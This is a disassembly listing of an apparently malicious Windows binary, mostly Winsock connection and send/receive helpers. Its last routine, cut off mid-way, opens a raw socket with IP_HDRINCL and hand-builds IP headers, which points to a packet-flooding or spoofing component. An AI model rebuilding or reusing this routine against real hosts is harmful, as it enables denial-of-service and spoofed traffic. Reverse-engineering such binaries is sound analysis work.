jnz short loc_404D6A
push [ebp+arg_0]
call sub_4053B1
pop ecx
xor eax, eax
jmp short loc_404D99
; ---------------------------------------------------------------------------
loc_404D6A: ; CODE XREF: sub_404D4D+E�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ecx+eax*4+0Ch], edx
mov eax, [ebp+arg_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
xor edx, edx
cmp eax, [ecx]
setnz dl
mov eax, edx
loc_404D99: ; CODE XREF: sub_404D4D+1B�j
pop ebp
retn
sub_404D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D9B proc near ; CODE XREF: sub_41349C+512�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404DAC
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404D9B:loc_404E18�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404DAC: ; CODE XREF: sub_404D9B+8�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short locret_404E1A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4+0Ch]
cmp eax, [ebp+arg_0]
jnz short loc_404E18
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+8]
jb short loc_404DDE
mov eax, [ebp+arg_4]
mov eax, [eax+8]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
loc_404DDE: ; CODE XREF: sub_404D9B+34�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
sub eax, [ebp+var_4]
shl eax, 2
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+10h]
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+0Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_4]
mov eax, [eax+4]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
jmp short locret_404E1A
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404D9B+29�j
jmp short loc_404DA5
; ---------------------------------------------------------------------------
locret_404E1A: ; CODE XREF: sub_404D9B+1A�j
; sub_404D9B+7B�j
leave
retn
sub_404D9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E1C proc near ; CODE XREF: sub_41349C+45F�p
; sub_4143B0+14E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
and [ebp+var_8], 0
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E3A: ; CODE XREF: sub_404E1C+BD�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_404E41: ; CODE XREF: sub_404E1C+1C�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+4]
jnb loc_404EDE
loc_404E50: ; CODE XREF: sub_404E1C+B7�j
and [ebp+var_14], 0
jmp short loc_404E5D
; ---------------------------------------------------------------------------
loc_404E56: ; CODE XREF: sub_404E1C:loc_404E86�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_404E5D: ; CODE XREF: sub_404E1C+38�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnb short loc_404E88
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+810h]
cmp eax, [esi+edx*4+0Ch]
jnz short loc_404E86
jmp short loc_404E88
; ---------------------------------------------------------------------------
loc_404E86: ; CODE XREF: sub_404E1C+66�j
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E88: ; CODE XREF: sub_404E1C+4D�j
; sub_404E1C+68�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnz short loc_404ECF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+80Ch], 200h
jnb short loc_404ECF
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+0Ch]
mov [ecx+eax*4+810h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+80Ch]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+80Ch], eax
loc_404ECF: ; CODE XREF: sub_404E1C+78�j
; sub_404E1C+87�j
xor eax, eax
test eax, eax
jnz loc_404E50
jmp loc_404E3A
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E1C+2E�j
and [ebp+var_10], 0
mov [ebp+var_C], 3E8h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
push 0
push 0
call dword_41722C ; select
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404F1A
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404F1A
mov [ebp+var_18], 1
jmp short loc_404F1E
; ---------------------------------------------------------------------------
loc_404F1A: ; CODE XREF: sub_404E1C+ED�j
; sub_404E1C+F3�j
and [ebp+var_18], 0
loc_404F1E: ; CODE XREF: sub_404E1C+FC�j
mov eax, [ebp+var_18]
pop esi
leave
retn
sub_404E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; CODE XREF: sub_41349C+470�p
; sub_4143B0+16D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_404F3A
; ---------------------------------------------------------------------------
loc_404F33: ; CODE XREF: sub_404F24:loc_404F77�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F3A: ; CODE XREF: sub_404F24+D�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404F79
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_404F77
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4+0Ch]
jmp short locret_404F7B
; ---------------------------------------------------------------------------
loc_404F77: ; CODE XREF: sub_404F24+3B�j
jmp short loc_404F33
; ---------------------------------------------------------------------------
loc_404F79: ; CODE XREF: sub_404F24+1F�j
xor eax, eax
locret_404F7B: ; CODE XREF: sub_404F24+51�j
leave
retn
sub_404F24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F7D proc near ; CODE XREF: sub_404FD0+6�p
; sub_41349C+59C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404F8E
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404F7D+37�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F8E: ; CODE XREF: sub_404F7D+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404FB6
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_4053B1
pop ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and dword ptr [ecx+eax*4+0Ch], 0
jmp short loc_404F87
; ---------------------------------------------------------------------------
loc_404FB6: ; CODE XREF: sub_404F7D+1A�j
mov eax, [ebp+arg_0]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
leave
retn
sub_404F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FD0 proc near ; CODE XREF: sub_41349C+5FB�p
; sub_4143B0+238�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_404F7D
pop ecx
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_404FD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_412BC9+11�p
; sub_41349C+40E�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_405010
mov [ebp+var_20], 17h
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405010: ; CODE XREF: sub_404FE7+1E�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405023
mov [ebp+var_20], 2
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405023: ; CODE XREF: sub_404FE7+31�j
and [ebp+var_20], 0
loc_405027: ; CODE XREF: sub_404FE7+27�j
; sub_404FE7+3A�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_405057
xor eax, eax
jmp locret_4050E8
; ---------------------------------------------------------------------------
loc_405057: ; CODE XREF: sub_404FE7+67�j
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_40505F: ; CODE XREF: sub_404FE7+A8�j
; sub_404FE7+F4�j
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_405068: ; CODE XREF: sub_404FE7+76�j
cmp [ebp+var_4], 0
jz short loc_4050DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_405091
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_404FE7+A6�j
push 0
push [ebp+var_2C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_2C]
call dword_4171F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050D2
call dword_417224 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4050D2
push [ebp+var_28]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_2C]
jmp short locret_4050E8
; ---------------------------------------------------------------------------
loc_4050D2: ; CODE XREF: sub_404FE7+CE�j
; sub_404FE7+DB�j
push [ebp+var_2C]
call sub_4053B1
pop ecx
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_4050DD: ; CODE XREF: sub_404FE7+85�j
push [ebp+var_28]
call dword_41DE8C ; freeaddrinfo
xor eax, eax
locret_4050E8: ; CODE XREF: sub_404FE7+6B�j
; sub_404FE7+E9�j
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050EA proc near ; CODE XREF: sub_401E38+80�p
; sub_402698+16�p ...
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 844h
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
mov [ebp+var_834], eax
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
imul edx, 3E8h
mov [ebp+var_830], edx
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_40513E
mov [ebp+var_20], 17h
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_40513E: ; CODE XREF: sub_4050EA+49�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405151
mov [ebp+var_20], 2
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_405151: ; CODE XREF: sub_4050EA+5C�j
and [ebp+var_20], 0
loc_405155: ; CODE XREF: sub_4050EA+52�j
; sub_4050EA+65�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_82C]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_405188
xor eax, eax
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_405188: ; CODE XREF: sub_4050EA+95�j
mov eax, [ebp+var_82C]
mov [ebp+var_4], eax
jmp short loc_40519C
; ---------------------------------------------------------------------------
loc_405193: ; CODE XREF: sub_4050EA+E3�j
; sub_4050EA+128�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40519C: ; CODE XREF: sub_4050EA+A7�j
cmp [ebp+var_4], 0
jz loc_40537D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_83C], eax
cmp [ebp+var_83C], 0FFFFFFFFh
jnz short loc_4051CF
jmp short loc_405193
; ---------------------------------------------------------------------------
loc_4051CF: ; CODE XREF: sub_4050EA+E1�j
push 0
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_83C]
call dword_4171F4 ; connect
mov [ebp+var_838], eax
cmp [ebp+var_838], 0
jz short loc_405217
call dword_417224 ; WSAGetLastError
cmp eax, 2733h
jz short loc_405217
jmp loc_405193
; ---------------------------------------------------------------------------
loc_405217: ; CODE XREF: sub_4050EA+119�j
; sub_4050EA+126�j
and [ebp+var_828], 0
loc_40521E: ; CODE XREF: sub_4050EA+1AF�j
and [ebp+var_840], 0
jmp short loc_405234
; ---------------------------------------------------------------------------
loc_405227: ; CODE XREF: sub_4050EA:loc_405259�j
mov eax, [ebp+var_840]
inc eax
mov [ebp+var_840], eax
loc_405234: ; CODE XREF: sub_4050EA+13B�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnb short loc_40525B
mov eax, [ebp+var_840]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405259
jmp short loc_40525B
; ---------------------------------------------------------------------------
loc_405259: ; CODE XREF: sub_4050EA+16B�j
jmp short loc_405227
; ---------------------------------------------------------------------------
loc_40525B: ; CODE XREF: sub_4050EA+156�j
; sub_4050EA+16D�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnz short loc_405295
cmp [ebp+var_828], 200h
jnb short loc_405295
mov eax, [ebp+var_840]
mov ecx, [ebp+var_83C]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_828]
inc eax
mov [ebp+var_828], eax
loc_405295: ; CODE XREF: sub_4050EA+17D�j
; sub_4050EA+189�j
xor eax, eax
test eax, eax
jnz short loc_40521E
lea eax, [ebp+var_834]
push eax
push 0
lea eax, [ebp+var_828]
push eax
push 0
push 0
call dword_41722C ; select
cmp eax, 1
jnz short loc_4052E0
push 1
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
push [ebp+var_82C]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_83C]
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4050EA+1CE�j
; sub_4050EA+27C�j
and [ebp+var_844], 0
jmp short loc_4052F6
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: sub_4050EA:loc_405360�j
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
loc_4052F6: ; CODE XREF: sub_4050EA+1FD�j
mov eax, [ebp+var_844]
cmp eax, [ebp+var_828]
jnb short loc_405362
mov eax, [ebp+var_844]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405360
loc_405319: ; CODE XREF: sub_4050EA+265�j
mov eax, [ebp+var_828]
dec eax
cmp [ebp+var_844], eax
jnb short loc_405351
mov eax, [ebp+var_844]
mov ecx, [ebp+var_844]
mov ecx, [ebp+ecx*4+var_820]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
jmp short loc_405319
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: sub_4050EA+23C�j
mov eax, [ebp+var_828]
dec eax
mov [ebp+var_828], eax
jmp short loc_405362
; ---------------------------------------------------------------------------
loc_405360: ; CODE XREF: sub_4050EA+22D�j
jmp short loc_4052E9
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: sub_4050EA+218�j
; sub_4050EA+274�j
xor eax, eax
test eax, eax
jnz loc_4052E0
push [ebp+var_83C]
call sub_4053B1
pop ecx
jmp loc_405193
; ---------------------------------------------------------------------------
loc_40537D: ; CODE XREF: sub_4050EA+B6�j
push [ebp+var_82C]
call dword_41DE8C ; freeaddrinfo
xor eax, eax
locret_40538B: ; CODE XREF: sub_4050EA+99�j
; sub_4050EA+1F1�j
leave
retn
sub_4050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538D proc near ; CODE XREF: sub_401E38+26E�p
; sub_4020C2+3FB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+arg_0]
call sub_4053B1
pop ecx
pop ebp
retn
sub_40538D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B1 proc near ; CODE XREF: sub_404279+77�p
; sub_40432E+1C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_417230 ; closesocket
pop ebp
retn
sub_4053B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: sub_401E38+15C�p
; sub_4020C2+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41720C ; send
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4053BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053DC proc near ; CODE XREF: sub_403DF3+D1�p
; sub_405443+21�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 2
jnb short loc_4053F6
push 271Eh
call dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_4053F6: ; CODE XREF: sub_4053DC+8�j
push 0
mov eax, [ebp+arg_8]
dec eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_417248 ; recv
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_405418
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40541D
loc_405418: ; CODE XREF: sub_4053DC+34�j
mov eax, [ebp+var_4]
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: sub_4053DC+3A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jb short loc_405435
push 271Eh
call dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_405435: ; CODE XREF: sub_4053DC+47�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
locret_405441: ; CODE XREF: sub_4053DC+18�j
; sub_4053DC+3F�j ...
leave
retn
sub_4053DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405443 proc near ; CODE XREF: sub_402698+8D�p
; sub_402698+2BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_40545B
xor eax, eax
jmp short loc_40546C
; ---------------------------------------------------------------------------
loc_40545B: ; CODE XREF: sub_405443+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
loc_40546C: ; CODE XREF: sub_405443+16�j
pop ebp
retn
sub_405443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40546E proc near ; CODE XREF: sub_405443+9�p
; sub_410649+2D�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_416BC0
and [ebp+var_804], 0
and [ebp+var_1008], 0
loc_405489: ; CODE XREF: sub_40546E+90�j
and [ebp+var_1014], 0
jmp short loc_40549F
; ---------------------------------------------------------------------------
loc_405492: ; CODE XREF: sub_40546E:loc_4054C1�j
mov eax, [ebp+var_1014]
inc eax
mov [ebp+var_1014], eax
loc_40549F: ; CODE XREF: sub_40546E+22�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnb short loc_4054C3
mov eax, [ebp+var_1014]
mov eax, [ebp+eax*4+var_800]
cmp eax, [ebp+arg_0]
jnz short loc_4054C1
jmp short loc_4054C3
; ---------------------------------------------------------------------------
loc_4054C1: ; CODE XREF: sub_40546E+4F�j
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054C3: ; CODE XREF: sub_40546E+3D�j
; sub_40546E+51�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnz short loc_4054FA
cmp [ebp+var_804], 200h
jnb short loc_4054FA
mov eax, [ebp+var_1014]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_800], ecx
mov eax, [ebp+var_804]
inc eax
mov [ebp+var_804], eax
loc_4054FA: ; CODE XREF: sub_40546E+61�j
; sub_40546E+6D�j
xor eax, eax
test eax, eax
jnz short loc_405489
loc_405500: ; CODE XREF: sub_40546E+107�j
and [ebp+var_1018], 0
jmp short loc_405516
; ---------------------------------------------------------------------------
loc_405509: ; CODE XREF: sub_40546E:loc_405538�j
mov eax, [ebp+var_1018]
inc eax
mov [ebp+var_1018], eax
loc_405516: ; CODE XREF: sub_40546E+99�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnb short loc_40553A
mov eax, [ebp+var_1018]
mov eax, [ebp+eax*4+var_1004]
cmp eax, [ebp+arg_0]
jnz short loc_405538
jmp short loc_40553A
; ---------------------------------------------------------------------------
loc_405538: ; CODE XREF: sub_40546E+C6�j
jmp short loc_405509
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40546E+B4�j
; sub_40546E+C8�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnz short loc_405571
cmp [ebp+var_1008], 200h
jnb short loc_405571
mov eax, [ebp+var_1018]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_1004], ecx
mov eax, [ebp+var_1008]
inc eax
mov [ebp+var_1008], eax
loc_405571: ; CODE XREF: sub_40546E+D8�j
; sub_40546E+E4�j
xor eax, eax
test eax, eax
jnz short loc_405500
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1010], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_100C], edx
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_1008]
push eax
push 0
lea eax, [ebp+var_804]
push eax
push 1
call dword_41722C ; select
cmp eax, 1
jz short loc_4055C9
xor eax, eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055C9: ; CODE XREF: sub_40546E+155�j
lea eax, [ebp+var_804]
push eax
push [ebp+arg_0]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_4055E1
push 1
pop eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055E1: ; CODE XREF: sub_40546E+16C�j
xor eax, eax
locret_4055E3: ; CODE XREF: sub_40546E+159�j
; sub_40546E+171�j
leave
retn
sub_40546E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055E5 proc near ; DATA XREF: sub_405E45+113�o
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = dword ptr -1344h
var_1340 = dword ptr -1340h
var_133C = dword ptr -133Ch
var_1338 = dword ptr -1338h
var_1334 = dword ptr -1334h
var_118D = byte ptr -118Dh
var_108D = byte ptr -108Dh
var_1087 = dword ptr -1087h
var_1083 = dword ptr -1083h
var_107F = dword ptr -107Fh
var_1078 = dword ptr -1078h
var_1074 = byte ptr -1074h
var_1058 = byte ptr -1058h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1358h
call sub_416BC0
push 2B9h
push [ebp+arg_0]
lea eax, [ebp+var_1334]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0FFh
push 3
push 2
call dword_417218 ; socket
mov [ebp+var_1078], eax
cmp [ebp+var_1078], 0FFFFFFFFh
jnz short loc_405643
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405643: ; CODE XREF: sub_4055E5+49�j
mov [ebp+var_1340], 1
push 4
lea eax, [ebp+var_1340]
push eax
push 2
push 0
push [ebp+var_1078]
call dword_417204 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40567E
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_40567E: ; CODE XREF: sub_4055E5+84�j
push 0
push [ebp+var_1078]
call sub_404457
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
lea eax, [ebp+var_108D]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_118D]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp+var_118D]
push eax
call dword_41723C ; gethostbyname
mov [ebp+var_1344], eax
cmp [ebp+var_1344], 0
jnz short loc_405700
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: sub_4055E5+106�j
mov eax, [ebp+var_1344]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
loc_405710: ; CODE XREF: sub_4055E5+EA�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405729
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: sub_4055E5+12F�j
push 1060h
push 0
lea eax, [ebp+var_1074]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp+var_1074]
mov [ebp+var_133C], eax
lea eax, [ebp+var_1058]
mov [ebp+var_14], eax
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0F0h
or al, 5
